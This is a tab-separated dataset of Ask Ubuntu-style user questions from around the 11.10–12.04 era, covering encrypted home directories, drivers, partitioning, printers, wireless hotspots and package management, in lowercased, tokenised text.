124107	using ssh private key login to automatically decrypt encrypted file systems without password prompt	to quote from a previous post : '' okay , so while it 's possible to use ssh public key authentication to log into your system without entering a password ( even if your home directory is encrypted ) , it 's not possible to automatically mount your encrypted home directory . '' this is the problem . while i appreciate that the password is used to unlock the passphrase , this means you need a password even when you arranged automatic login so you do n't need a password . a better solution would be to use the remote authentication of the private key to unlock a second copy of the decryption passphrase and based on that unlock then allow the file system to be decrypted . in this way , i don ; t need a password but only when an authorized and ( public key ) authenticated user logs in can the files be read . `` to solve this , you 'll need to add a line to the end of your unmounted $ home/.profile : ecryptfs-mount-private this will ensure that after you 've logged in using ssh public key authentication , you 'll be prompted for your password and will mount your encrypted data . if it 's already mounted , then this command should just silently succeed . '' except that it requires the password be typed . what should happen is that if your ssh succeeds , you should have access to the decrypted filesystem . so my question is , is there a work-around for this yet ? or lacking one , can someone who is in charge of that particular mechanism fix it to work this way ?
124108	what is wine . is it part of ubuntu ?	i want to run ms office on ubuntu and have found messages saying you can do it with wine , but i do n't know what wine is .
124110	partitioning issues	so i decided to include my entire hd space of 320gb in the /dev/sda3 partition where i had installed ubuntu . i was told that it is better to keep some hd space away from the installation partition . so i resized the partition to 50gb in order to use the rest to store data . i created the partition /dev/sda4 and labeled it as 'data ' . however , i am unable to copy any data into this folder . when i go to 'data ' i only see the fold 'lost+found ' . but i am not able to create any other folder nor can i move my data here . have i done anything wrong ? also i see that 1.75gb of space has already been taken ! how can this be possible ? here 's the screenshot from the gparted partition editor . http : //i.stack.imgur.com/ckcqi.png
124111	shutting down via command line causes the system to hang on the shutdown screen	i am using lubuntu 11.10 , and the commands : sudo shutdown and sudo halt do not shutdown my system . instead the computer hangs at the shutdown screen that appears just before powering off . from that point on it just does nothing . any ideas on why this happens ?
124115	ubuntu 12.04 not finding my onboard lan : realtek rtl8111e	just downloaded the latest version of ubuntu and installed it clean from cd on bare drive . i get no recognition of my network and onboard network hardware . everything i 've been reading says v12.04 fixed the driver issues with the realtek rtl8111e . i 'm new to linux and i 'm seeing ubuntu as my escape from the microsoft trap . i really want this to work . any advice ? how do i fix this ? i 'm willing to learn what ever it takes . asus website does n't have any relevant help . realtek has a driver posted in 2012/03 . i downloaded it but i 'm not sure if it 's the same as the one ubuntu installed . problem is every post about this issue is from 2011 . does anyone know if this is fixed ?
124118	no removable devices in vmware	i 've installed vmware on a new ubuntu 11.10 pc and am unable to see any of my removable devices in the list . do i need to first enable these ? if so , how ? or ... is this a permissions thing where i need to add my user account to the vmware group of something like that ?
124119	has the ubuntu overheating problem for sony vaio solved ?	i used sony vaio vpcea23en with graphics card ati radeon hd 5145 and have been using ubuntu 11.10 and recently upgraded to 12.04 beta , however the problem of overheating ( 60-70 ) still persists . i have installed the graphics driver properly . are there some features of ubuntu that cause this problem ? i would have no problem uninstalling them ; or will using a lighter version of ubuntu ( lubuntu ) solve this problem ? right now i am using win7 and would like to switch to ubuntu asap .
124120	how do i install gnomenu ?	installing these programs , using parts of the mate project works . but does another way to install these packages exists ? using 12.04 .
124121	can not run gwget download manager	i use ubuntu 11.04 natty narwhal . i was searching for download manager and i found gwget download manager as highly recommended download manager for ubuntu . i have installed it from software center which is 1.0.4 . now the problem is i can only run this one time if i close gwget and try to run it again it never shows up . if i logout and try after logging in again i can run it for the first time then it does not start . how do i get rid of this problem ?
124122	how does the installer automagically fill in the suggested hostname ?	i was just installing 12.04 beta2 when i noticed something really odd . i was at the screen where you enter your username/hostname/password/etc . i typed 'me ' for my real name as i normally do . this is the weird part . the installer filled in the hostname as 'me- # # # - # # 5-1544 ' where the # # # - # # 5-1544 is my parent 's land-line phone number ( about two hundred miles west of where i am ) . where did the installer get that number ? i am installing over a previous install of ubuntu , but that was a throw-away install that i never put that number on . i have other partitions and other oses on this hard drive , but none were mounted at the time of install and none were selected to be used as mount points in the previous screen . picture of what i 'm talking about :
124123	new ubuntu user , wireless connection - firefox wo n't work	i 'm new to linux . just installed ubuntu 11.10 . setting up seemed to go ok . i seem to be able to connect to my wireless connection ( says `` connection established '' ) but fir fox says `` server not found when i try to connect to internet . please remember to keep it simple if you ask me to enter code into the terminal as i am new to this . hope someone can help me .
124132	sharing internet to ubuntu 12.04 vmware guest	i installed ubuntu 12.04 on my mac vmware fusion ( version 4.1.2 ) . the installation went fine and ubuntu seemed to update itself during the install . after reboot i can not get ubuntu to access the internet via my macs ethernet connection ( connected to a router ) . i have tried to set the vmware network adaptor to nat or bridged and host only without success . in ubuntu i have the eth0 set to automatic dhcp . vmware tools are installed as well . i know next to nothing about what to do here and net searches on both stackoverflow and superuser sites are producing not results for me . could someone please help ?
124139	how to install truecrypt ?	i have recently downloaded truecrypt from www.truecrypt.org and got a .tar.gz file . i am completely new to ubuntu and dont know how to install it.please help and give extra details .
124144	how to set up a wifi hotspot using kubuntu 12.04	i 'm not having any luck with the instructions here or here . i ca n't get ad-hoc wifi to work in kubuntu 12.04 on a thinkpad x220 with intel wireless . all indications are that it should work . any kde users want to tell me how ? i plan to let other devices connect to my x220 to obtain files . i do n't need to share the x220 's internet connection . i just want it to act as a wifi nas . i would prefer to use wpa security ( or better ) . i also want to do this via the gui network manager .
124151	can not find libtinyxml 2.6.x	i'am running ros on ubuntu . when i tried to compile a package , errors occured . on the develop page , it suggested that we should update tinyxml to the latest version , which is 2.6.x . i typed sudo apt-get update first and sudo apt-get install libtinyxml on the command line , but i can only find 2.5.x version . i check the official website and make sure that the latest version is 2.6.2 . my ubuntu is 10.10 . how can i install libtinyxml 2.6.2 using apt-get ?
124154	what exactly does 'wipe available diskspace ' do ?	one of the options offered when you right click the desktop or within a nautilus window is `` wipe available diskspace . '' i 'd think that means all unused diskspace but assumptions can be dangerous . i do n't want to try it only to find out that available meant `` all '' . i ca n't remember seeing this option before 12.04 . i was asked to provide an image but unfortunately when right clicking to get the drop down menu , the print screen function does n't respond thereby making an image impossible . it appears that no responder so far has actually used this nautilus option . jorge suggested that the feature was actually nautilus-wipe and i verified that is the case by removing nautilus-wipe and seeing that the menu option is now gone . documentation for nautilus-wipe is almost non-existent and what little i found was superficial and contradictory . this does n't leave me with a warm and fuzzy feeling regarding my using an application or feature that purports to `` wipe disk '' without a clear definition of what is wiped .
124157	how to check when was the last time anacron successfully run ?	how can i check when was the last time anacron completed all the daily/weekly/monthly jobs ? i understand that the timestamps at /var/spool/anacron are the times anacron started , but it can be that the system was restarted or shutdown between start and completion . is it possible to check the status and timestamp of completion of every anacron job seperately ?
124159	a light alternative to gnome-system-monitor ?	as i 'm programming a little game , i often use gnome-system-monitor to check if there 's any memory leak in my program . but the monitor takes too much lime to launch and is pretty slow . could you suggest a graphical and light alternative to gnome-system-monitor ?
124163	access ubuntu programs from wmii	i 'm using the wmii desktop manager and i 'd like to find a way to access ubuntu programs . wmii does not have a menu as such so i either need to add the ubuntu menu somehow or else find a list of the ubuntu system programs so i can execute them by name .
124164	why in ubuntu ( wub ) i does it skip windows when i update grub ?	i set it to not show the os menu so now i need a solution to get this sorted without a disc recovery because i do n't have one ! is their a way to sort this through the `` terminal '' app on ubuntu ( i used wubi to install ) please do not say anything with a recovery cd because i do not have that kind of facility with this laptop
124166	how do i add myself into the sudoers group ?	i 've added myself back into the admin 's group i think , by following this . but i still ca n't do commands like : sudo aptitude update i get the message oshirowanen is not in the sudoers file . this incident will be reported . how do i add myself into the sudoers group now that i am in the admin group ?
124169	ubuntu one syncing only folders and no content !	i know that anyone could say that this question already exists but my problem still exists . so what do you suggest ? i have a folder in my laptop and i want it to be accessible from my desktop and my other devices.but only sub folders are syncing and no content of them . thanks , any help would be great !
124172	how can i remove an unfinished java installation installed via terminal ?	well , since i was so stupid to install the java via terminal with official package , it stuck on the licence agreement screen , because i had to accept it , but no key from my keyboard worked to accept . so i 've closed the terminal , killing my install . now it says in newly opened terminal java is installed , but does not display in software center . the problem is , i want to uninstall it to get to the software center one . some more info : why do i want java actually ? because i recently upgraded my graphicscard from onboard to radeon . so , my minecraft would actually load up , but as soon as it has to load a map , it crashes . i looked in the log file it leaves behind , i don´t see any issues with my graphics , it says there is something wrong with my java . can´t post output here because i 've deleted the files . since java isn´t working , i can not create a new one . on my onboard card it worked , but it does n't play good because that thing came out of '06 . so since i 've installed my official radeon drivers and plugged in my card it stopped working . my graphicscard isn´t broken too , because it still worked in win 7 . i had working the openjdk runtime 6 ( which i meant in previous part too ) on my onboard . i had to uninstall that , and install the official , which i think was the most worse choice , because i also could have reinstalled runtime 6 or even 7 from software center . maybe the output from java -version could be handy : java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre11-0ubuntu1.11.10.2 ) openjdk client vm ( build 20.0-b11 , mixed mode , sharing ) so , how could i uninstall an unfinished ! install of java via terminal ? if needing more info , just ask for it !
124173	how do i get a dlink dwm 156 broadband modem working ?	i just bougth d-link dwm 156 usb modem and having a problem to have it works with ubuntu i had done edit connection , and then insert mobile broadband info , and after that i dunno what to do.. i do lsusb and i found this : bus 002 device 003 : id 2001 : a80b d-link corp . i check in the properties and my modem is detected as a cd drive , how can i change it to modem
124174	how do i move my encrypted /home to a new computer ?	hi i have a new notebook and i want to move my home data to the new computer . i think there are multiple ways of doing this copy all to a external hdd and move back on new computer do an deja-dup backup and then restore on the new computer rsyc/move to new computer via sshfs ... ? my question is how do i keep the current ecrypt encryption of /home in place and get it working properly on the new computer . how do i have to install the new computer so i can use the encrypted home files from the old ? if i would use deja-dup do i need to worry about the ecrypt stuff on the old machine or does the new installation simply enctypt everything new ?
124177	is there a simple way to check a live cd for errors ?	i was trying to use 2 methods `` howtomd5sum '' and `` howtosha256sum '' , but they are all way complicated for a newbie . is there an application that could do the same in a simple way ? i 've already tried `` checksum calculator '' too , but it seems to work on iso files , not on live cds .
124183	what 's the difference between `` mouse '' and `` sloppy '' ?	from the gconf key description : the window focus mode indicates how windows are activated . it has three possible values ; `` click '' means windows must be clicked in order to focus them , `` sloppy '' means windows are focused when the mouse enters the window , and `` mouse '' means windows are focused when the mouse enters the window and unfocused when the mouse leaves the window . when i configure focus_mode using gconf-editor , /apps/metacity/general/focus_mode , i ca n't tell the difference between mouse and sloppy . when i set this key as mouse , the focus is still on that window if i hover the cursor to the background .
124185	completely uninstall teamspeak 3 client	i have installed teamspeak 3 using the .run file provided on their downloads page , but something has gone awfully wrong and i want to completely reset all settings to default . i figured that a clean reinstall would sort that out , but after removing the folder it unpacks and re-running their .run script , my settings remain in place . is there any way to completely remove teamspeak 3 so i can reinstall it ?
124186	i cant get the most basic sed command to execute on command line	i feel like a total newb . why does this not work ? $ echo foobar > textfile $ sed /foo/bar/ textfile sed : ca n't find label for jump to `ar/' i 've also tried sed `` /foo/bar/ '' textfile and sed '/foo/bar/ ' textfile , which all yields the same error . using ubuntu 8.04 and gnu sed version 4.1.5 through bash .
124191	installing gnome-shell gives me gnome 2 instead of 3	i just installed ubuntu 12.04 and wanted to use the gnome 3 shell , according to this site it was just a matter of installing the gnome shell as gnome 3 is already part of ubuntu 12.04 so i did sudo apt-get install gnome-shell and logged out , selected gnome and logged in and i was looking at gnome 2 instead of 3 . what went wrong ?
124192	printer `` ripping '' forever ( network printer )	since i installed ubuntu 11.10 , printing is a disaster . i did not have the problem with lucid lynx ( ubuntu 10.04 ) , but maybe it just comes from the fact that someone else had installed it for me , and possibly it configured better . when i print a pdf , even 2 pages , my printer ( sharp mx 2300n ) stays in rippen for hours . `` rippen '' is a german word , not really sure how to translate . google translate says , the english equivalent is `` rib '' . and eventually , sometimes , the pages finally get printed . but in between my whole floor is very angry because they also need the printer . additionally , i do n't always have the whole day for waiting for my pages . i remember that when printing i used to be asked if i wanted to reduce transparency effects , which does not seem to happen anymore after i installed ubuntu 11.10 . is there any connection ? not sure , because i do n't think it was for pdf files .
124198	gnome-shell-extension : js that works in looking glass does n't in extension	i 've got the following snippet of code that ( in the looking glass ) gives me a list of contacts i have ( managed by gnome-contacts ) : // method 1 : const contactdisplay = imports.ui.contactdisplay ; let csp = new contactdisplay.contactsearchprovider ( ) ; let contacts = csp.getinitialresultset ( [ '' ] ) ; contacts.length // 120 contacts // method 2 : const contactsystem = shell.contactsystem ; let cs = contactsystem.get_default ( ) ; let contacts2 = cs.initial_search ( [ '' ] ) ; contacts2.length // 120 contacts this two pieces of code are ( as far as i know ) equivalent , as contactsearchprovider 's getinitialresultset basically calls the initial_search method of contactsystem.get_default ( ) . however , when i put these same bits of code into a gnome shell extension ( say the enable method ) , and i global.log ( contacts.length ) or global.log ( contacts2.length ) , i always get 0 . hence for some reason this code works in looking-glass but not in an extension . why is this ? are the contacts not loaded at the point the extension is executed ? is the contact search provider somehow not connected up to me ? how can i work around it ?
124209	new mouse cursor does n't appear in list sudo update-alternatives -- config x-cursor-theme	i tried installing a new mouse cursor and put the unzipp/tarred file in the folder named ~/.icons . i selected the theme with gnome-tweak-tool , but it wo n't change properly . the default cursor does n't change , all the rest does though . i 've tried this method ( and many others now ) of manually adding it through gksu gedit /usr/share/icons/default/index.theme . i 've tried it with gnome-tweak-tool , with ubuntu tweak , with gconf-editor and even sudo update-alternatives -- config x-cursor-theme , but when i try this method my mouse cursor does n't even appear in the list . how can i add my new mouse cursor to this list ?
124210	is there a quickly command to completely remove a project	i am trying out application development with quickly but i have a couple of projects that i have come to nothing and i want to completely remove them . is there a command to do that ?
124211	how to partition the hard drive and with which file system ?	i have a 238 gb formatted hdd , and 3gb of ram . i am thinking a 20-30 gb os partition , and ntfs for data for obvious reasons . any suggestions ?
124213	accidently deletetd .ecryptfs folder - cant log in anympre	i accidently deleted the .ecryptfs folder , also the .private folder . cant login anymore . just as guest . how can i restore to the system before i deletetd those fodlers ?
124216	no sound in files captured using audiorecorder or outrec	i am trying to record the sound output of my computer . i have installed outrec ( with all the required dependencies ) and audio recorder . i also installed pulse audio volume control and set it to monitor of built in audio analogue stereo . i have also tried alsa mixer in the terminal but nothing seems to work . a file is created but no sound is present . is there anything i have missed ?
124220	overscan compensation disabled	a fresh install of 12.04 . i need to compensate for overscan , but the setting is disabled for one of my monitors . not sure why and not sure what i can do aboot it . is there any way i can enable the overscan compensation slider ?
124221	what graphic driver ? acer 5750	i bought a new laptop , acer 5750 and installed ubuntu 11.10 on it . now i would like to know what graphic driver should i install for it . when i go to 'aditional drivers ' , it does not show any graphic drivers to be activated . my graphic card is : intel hd graphics 3000 . thanks in advance . : )
124222	wireless does not detect network on an acer 5750 with a broadcom 43227	i 've installed ubuntu 11.10 on my laptop acer 5750 . it detects wireless card and also lot of networks , but the problem is that it does not detect wireless network which is detected with my phone and another laptop ( has winxp sp2 os ) . lspci|grep network gives me only one line : 03:00.0 network controller : broadcom corporation bcm43227 802.11b/g/n what could be a problem ?
124223	are there any error with my boot ?	i really feel no error with my ubuntu 10.10 system to date . but when it boots , i can see some messages display . i read the boot.log in the /var/log directory and here it is ! are there any errors when booting or what are the messages display below
124228	my laptop runs very hot with lubuntu 11.10 , what can i do ?	what are my options ? can i make the fans run more , can i make the cpu do less work , is it my graphics card ? ibm t60 with core duo , ati graphics thanks
124229	rhythmbox playing without sound	i have a clean 12.04 install . imported my mp3 's ( from a windows share ) into rhythmbox and although they do appear to be playing no sounds is to be heard . playing a radio-stream works just fine . playing the same mp3 in spotify works fine too . i have looked at the mixer settings ( but as radio is playing that does not seem to be the issue ) . can not find a reason why there is no sound ...
124230	how can i completely replace windows xp by installing ubuntu over it ?	system specs : 80gb hdd 2gb ram .
124232	why soundjuicer and rythmbox do n't allow me to tweak the cd ripping profiles ?	i installed an ubuntu 12.04 server then added only the packages i needed to have a gnome 3 desktop but something must still be missing . in fact neither rhythmbox or soundjuicer allow me to tweak the cd ripping profiles . any idea what it 's missing ?
124234	ask for a shortcut problem	i am using ubuntu 11.10 . whenever i type ctr+f in chrome or okular or kile , the xterm will appear instead of usually-expected `` search bar '' . i have installed xbindkeys . it seems not that problem since the problem persists if i uninstall xbindkeys . does anyone know what setting i should change ? thank you very much !
124235	where are decrypted files stored during runtime ?	i wonder where does ubuntu/ecryptfs store decrypted files from encrypted $ home directory during runtime . does it decrypt files just-in-time and store them only in ram ? what about large files ( e.g . 1080p movies with 20gb ) ? is it possible that there are some decrypted files left on hdd after system shutdown ? does the decrypting/encrypting affect os performance significantly ?
124236	updating server to 12.04 on release	i 'm currently running a lamp server using ubuntu 11.10 . with the release of 12.04 this week i 'm wondering whether i should update to 12.04 right away or if i should wait some time . thanks for reading .
124238	clearing out deja-dup backups from my ubuntu one cloud ?	so , i pretty much exclusively use ubuntu one for deja-dup . i have 3 computers hooked into this system , but one of them i do n't use anymore . and now my 5gb of storage has been filled up . i ca n't afford to buy more right now . i tried unlinking the deja-dup/cr-48 folder , ( yes , that unused computer is a cr-48 ) but that did n't free up any storage . how do i free up storage so that i can keep making backups ?
124240	how do i make the webcam on a compaq presario cq60 notebok work ?	how can i make the webcam to work ? i mention is not working with skype or kopete . computer specs : product : compaq presario cq60 notebook pc memory 3.7 gb processor amd athlon dual-core ql-62 ă 2 graphics geforce 8200m g/pci/sse2/3dnow os type 32-bit os kernel linux 3.0.0-17-generic release 11.10 oneiric ocelot
124243	one file not syncing	i put 3 files in the ubuntuone folder . the 2 smaller ones ( few kilos ) synced no problem . the 3rd one ( 600megs ) has n't , and it 's been there a couple of days now . it shows the syncing icon when browsing , but the app tells me that no files are currently syncing . any idea what i can do to `` force '' or restart the syning ? or how to get something like an indicator by file being synced ?
124246	what command changes the group setting for a directory ?	i am having an access problem to some files and directories that i have tracked down to the group assigned to access them . when i manually change the name of the group in the properties/permissions menu for a directory from the default setting ( mygroup ) to www-data used by my drupal website , the directory error messages i get are gone . there are a large number of files and directories that require this change . if believe using chmod will change the owner which is set correctly and being new to ubuntu , i am reluctant to experiment without a better understanding of how owner and groups work in the permissions settings . what command changes the group setting for a directory ?
124255	is there a cataloging software that links with goodreads ?	i have been experimenting with tellico collection management software . i like how easy it is to use and that it will create all kinds of collections for any kind of medium ( movies , books , games ) . the thing i would really like to be able to do is sync this with my goodreads account so when i enter a book into the collection on goodreads or on tellico they will sync . any ideas if this is possible or if there is another software like tellico that has this capability ? thanks for your help .
124261	how can i host a domain/website on my new vps ?	i am an average ubuntu user and currently i decided to strengthen my knowledge in ubuntu . since i am a web developer , lately i decided to setup my own web server powered by ubuntu . i just bought an unmanage vps powered by ubuntu 11.10 . i have managed to install the apache , php , mysql and the basic security changes . previously , i was just a shared hosting user where everything is managed via cpanel which is easy . now is totally different and i am clueless since i am on unmanaged vps and of course the hosting company will not help me . my question : previously , when i want to host new website , after i purchase a domain from registrar i will change the domain nameservers with my sharedhosting nameservers i just add the domain via cpanel . how can i host a domain/website on my new vps ? how to have a nameserver ? how to setup the nameserver ?
124269	do i need to partition my whole harddisk to install ubuntu for the first time ?	i want to install ubuntu for the first time in my notebook , is this necessary to partition my whole hard disk to install ubuntu or just the c drive or any one ( like installing windows 7 or others ) ? i do n't want to lose all my data ...
124274	how to find the terminal in lubuntu ?	where can i find the terminal in lubuntu ? i thought the ctrl+t option works as it does in ubuntu too .
124275	installation of drivers for canon mg5300 series fails…	i have a new mg5320 printer , and several ubuntu computers on my local network . i am trying to install drivers to get them to work . the ppa : michael-gruz/canon does not ( yet ) have drivers for the mg5300 series . the canon linux drivers from support-asia.canon-asia.com provides drivers and an install script . the install script fails on my amd64 10.10 with the error `` an error occurred . the package management system can not be identified . '' a glance at the install script shows testing for dpkg… dpkg -- version 1 > /dev/null 2 > & 1 c_system_deb= $ ? returns 0 for c_system_deb and then tests and exits at… if [ $ c_system_rpm = 0 -a $ c_system_deb = 0 ] || [ $ c_system_rpm ! = 0 -a $ c_system_deb ! = 0 ] ; then return $ c_err_code yet i know dpkg is installed , i.e . ⋯ @ ⋯ : ~/desktop/cnijfilter-mg5300series-3.60-1-deb $ sudo dpkg -- version debian `dpkg ' package management program version 1.15.8.4ubuntu1 ( amd64 ) . this is free software ; see the gnu general public license version 2 or later for copying conditions . there is no warranty . how do i install thei printer using the lan with wireless ap ?
124277	ppas not showing up in synaptic ?	for some reason several ppas are not visible in the side-panel of synaptic , nor are their apps available when searched for . but they are visible when clicking settings > repositories , and they all match current install which is precise 12.04 , and all have check boxes checked . the ppas were added via terminal , which did n't report any issue when they were added , and also several other ppas were added moments previous which are all present and correct . any ideas ? thanks
124281	configure external display on ubuntu 11.10	i 've installed ubuntu 11.10 on my acer aspire 5742z and everythings working great except my external display . i 've got an hp zr2440w . the display settings for this show it 's running at its native 1920*1200 at 60hz but the image is n't at native resolution . its stretched a little , both vertically and horizontally . is there a way i can automatically configure the external display ?
124292	what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ?	i am planning on doing a fresh install of ubuntu and want to know what is the correct way to install ati catalyst video driver ? there are multiple valid answers for this question spanning over several versions of ubuntu . for your convenience an index of each below : 14.04 13.04 12.10 12.04 11.10/11.04 etc
124297	running stockfish/rykba engines with eboard	i am using eboard for playing chess with automatically supported engines like gnuchess4 , crafty etc . my question is : how can i run strong engines like stockfish , rykba on eboard ?
124300	can not create hotspot after upgrade from 11.04 to 11.10	when i use ubuntu 11.04 i have problem with create a hotspot . now im upgrade system to ubuntu 11.10 and i can not create it . when i try create hotspot , network manager in loop ask me for key , but i promt it ... any idea ? syslog info : wpa_supplicant [ 1099 ] : authentication with 00:00:00:00:00:00 timed out . wpa_supplicant [ 1099 ] : trying to associate with ssid 'hotspot' kernel : [ 105.799013 ] ieee80211 phy0 : wl_ops_config : change monitor mode : false ( implement ) kernel : [ 105.799025 ] ieee80211 phy0 : wl_ops_config : change power-save mode : false ( implement ) wpa_supplicant [ 1099 ] : nl80211 : failed to set interface into ibss mode wpa_supplicant [ 1099 ] : association request to the driver failed kernel : [ 105.801088 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) kernel : [ 105.801765 ] addrconf ( netdev_up ) : wlan0 : link is not ready hotspot wpa_supplicant [ 1099 ] : authentication with 00:00:00:00:00:00 timed out . hotspot wpa_supplicant [ 1099 ] : trying to associate with ssid 'hotspot' hotspot kernel : [ 115.859235 ] ieee80211 phy0 : wl_ops_config : change monitor mode : false ( implement ) hotspot kernel : [ 115.859248 ] ieee80211 phy0 : wl_ops_config : change power-save mode : false ( implement ) hotspot kernel : [ 115.859770 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) hotspot wpa_supplicant [ 1099 ] : nl80211 : failed to set interface into ibss mode hotspot wpa_supplicant [ 1099 ] : association request to the driver failed hotspot kernel : [ 115.861261 ] addrconf ( netdev_up ) : wlan0 : link is not ready hotspot wpa_supplicant [ 1099 ] : authentication with 00:00:00:00:00:00 timed out . hotspot wpa_supplicant [ 1099 ] : trying to associate with ssid 'hotspot' hotspot wpa_supplicant [ 1099 ] : nl80211 : failed to set interface into ibss mode hotspot wpa_supplicant [ 1099 ] : association request to the driver failed hotspot kernel : [ 125.929227 ] ieee80211 phy0 : wl_ops_config : change monitor mode : false ( implement ) hotspot kernel : [ 125.929234 ] ieee80211 phy0 : wl_ops_config : change power-save mode : false ( implement ) hotspot kernel : [ 125.929740 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) hotspot kernel : [ 125.930379 ] addrconf ( netdev_up ) : wlan0 : link is not ready hotspot networkmanager [ 949 ] : < warn > activation ( wlan0/wireless ) : association took too long . hotspot networkmanager [ 949 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] hotspot networkmanager [ 949 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets hotspot networkmanager [ 949 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected hotspot networkmanager [ 949 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . hotspot networkmanager [ 949 ] : < warn > no agents were available for this request . hotspot networkmanager [ 949 ] : < info > ( wlan0 ) : device state change : need-auth - > failed ( reason 'no-secrets ' ) [ 60 120 7 ] hotspot networkmanager [ 949 ] : < warn > activation ( wlan0 ) failed for access point ( hotspot ) hotspot networkmanager [ 949 ] : < info > marking connection 'hotspot ' invalid . hotspot networkmanager [ 949 ] : < warn > activation ( wlan0 ) failed . hotspot networkmanager [ 949 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] hotspot networkmanager [ 949 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ]
124304	ubuntu install and data recovery from windows	i 'm running ubuntu 11.10 on a mem stick as my win 7 install has died and wanted to install permanently . there are 6 partitions across the three hdd 's and obv it only sees 4 of them . all the discs are practically full ( apart from the win 7 partition obv ) so i ca n't back up ( over 1tb of stuff ) without buying another drive ( s ) that i do n't need ( and ca n't afford ) . is there anything i can do to keep the data and install ? specifically , and i apologise if this is a dumb question , can you resize the partitions and does this wipe all the data ? i thought just unplugging one of the drives might enable the opsys to see the other drive , but no . i have only used ubuntu on a teeny tiny netbook so am something of a noob when it comes to large drives and files . pretty sure the only solution is to go back to windows ( aaaarghh ) or wait and buy another huge drive and backup , but any help or alternatives are appreciated . ta .
124306	epson printer driver needs libqt4-gui	i 'm trying to install a driver for the epson sx440 . i 've downloaded the .deb from : http : //openprinting.org/printer/epson/epson-sx440_series but it needs lsb installed . i 'm on 10.04 , and i go to install lsb 4.0 . but that needs libqt4-gui installed . i have the rest of libqt4 at 4.7.0 , but libqt4-gui apparently changed its name to libqtgui4 at that version . since lsb ca n't find libqt4-gui , it refuses to install , and so i ca n't install the printer . what would be the best thing to do here - should i downgrade libqt4 to 4.6.3 ( how do i do that ? ) , or is there some way to tell lsb that it can actually find libqt4-gui under the new name of libqtgui4 ? thanks . ls /etc/apt/sources.list.d | sed '/\.save/ d' alex-p-notesalexp-lucid.list and471-kazam-daily-builds-lucid.list arx-release-lucid.list cburgmer-ppa-lucid.list cheleb-blender-svn-lucid.list dlynch3-ppa-lucid.list ferramroberto-linuxfreedomlucid-lucid.list freetuxtv-freetuxtv-lucid.list google-talkplugin.list jonoomph-openshot-edge-lucid.list kubuntu-ppa-backports-lucid.list kubuntu-ppa-beta-lucid.list kubuntu-ppa-ppa-lucid.list matthaeus123-mrw-gimp-svn-lucid.list me-davidsansome-clementine-lucid.list medibuntu.list mozillateam-firefox-stable-lucid.list neurodebian.sources.list norsetto-ppa-lucid.list openclonkdevteam-release-lucid.list openoffice-pkgs-ppa-lucid.list opera.list pyexiv2-developers-ppa-lucid.list rkward-devel-rkward-stable-lucid.list shnatsel-gimp-paint-studio-lucid.list spideroak.com.sources.list sunab-kdenlive-release-lucid.list ubuntu-mozilla-daily-ppa-lucid.list ubuntu-x-swat-x-updates-lucid.list uqvislab.list wfg-0ad-lucid.list apt-cache policy libqt4-gui libqtgui4 libqt4-gui : installed : ( none ) candidate : 4:4.6.3-0ubuntu1 version table : 4:4.6.3-0ubuntu1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/ppa/ubuntu/ lucid/main packages 4:4.6.2-0ubuntu5.3 0 500 http : //gb.archive.ubuntu.com/ubuntu/ lucid-updates/main packages 500 http : //security.ubuntu.com/ubuntu/ lucid-security/main packages 4:4.6.2-0ubuntu5 0 500 http : //gb.archive.ubuntu.com/ubuntu/ lucid/main packages libqtgui4 : installed : 4:4.7.0-0ubuntu2~lucid1~ppa1 candidate : 4:4.7.0-0ubuntu2~lucid1~ppa1 version table : *** 4:4.7.0-0ubuntu2~lucid1~ppa1 0 100 /var/lib/dpkg/status 4:4.6.3-0ubuntu1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/ppa/ubuntu/ lucid/main packages 4:4.6.2-0ubuntu5.3 0 500 http : //gb.archive.ubuntu.com/ubuntu/ lucid-updates/main packages 500 http : //security.ubuntu.com/ubuntu/ lucid-security/main packages 4:4.6.2-0ubuntu5 0 500 http : //gb.archive.ubuntu.com/ubuntu/ lucid/main packages
124310	why does unity 2d have compositing enabled by default ?	why does unity 2d have compositing enabled , does n't that defeat the whole purpose of having a light weight unity variant ?
124315	how can i filter `` dpkg -- get-selections '' to just packages available in repositories ?	i would like to get a list of packages installed on one system and install all of them on another system . i know that dpkg -- get-selections can give me a list of all installed packages which i can pipe into dpkg -- set-selections on the target system . however , some of the installed packages are ones that i built myself locally ( using e.g . checkinstall ) and are not available from the repositories . the dpkg -- set-selections process will fail when it is unable to find these packages in the repositories . so is there a way i can filter the list generated by dpkg -- get-selections so that it only contains packages whose currently-installed version is available in my current repositories ?
124318	which version of ubuntu 12.04 should i go for ? 32bit or 64 bit ?	this question may have been asked infinite times but i want to know in my specific case that if i am using 2gb ram and a core2duo processor which one will give better results ? i have already used 11.10 64bit version on virtualbox on my laptop , but it really wo n't tell that if 64 bit is faster than 32 bit ( though technically it is ) . found many threads regarding confusion between 32 and 64 bit , but not a case like mine . please help me out with this .
124321	how do i backport my favorite package 2-3 times each year ?	my current favorite game is simutrans . debian already picks up new releases , and ubuntu imports from debian . the game developers release a new version irregularly every 3-9 months , and most multiplayer servers promptly migrate to the newest version . this means that the ubuntu version is about one or two releases behind ( currently three behind ! ) , and that ubuntu players can not use the servers because their client version is too old . how can i get the pre-release version backported to the current release ? do i just file a backport request ? every time ? ( 2-3 times each year ? ) how can i make it easy on the backporters team ? is there a team i should join or permissions i should seek ? or some other avenue i should pursue ?
124328	problem with ubuntu and loading	what is going wrong when , i have to use ubuntu 2d because , when i try logging into ubuntu , it loads slow and wont show and side bars or load anything , so if someone could help me , please would be appreciated . tried so many things , i even upgraded my os but it followed and i still ca n't access ubuntu to play my minecraft game , so if anyone has any help , much appreciated .
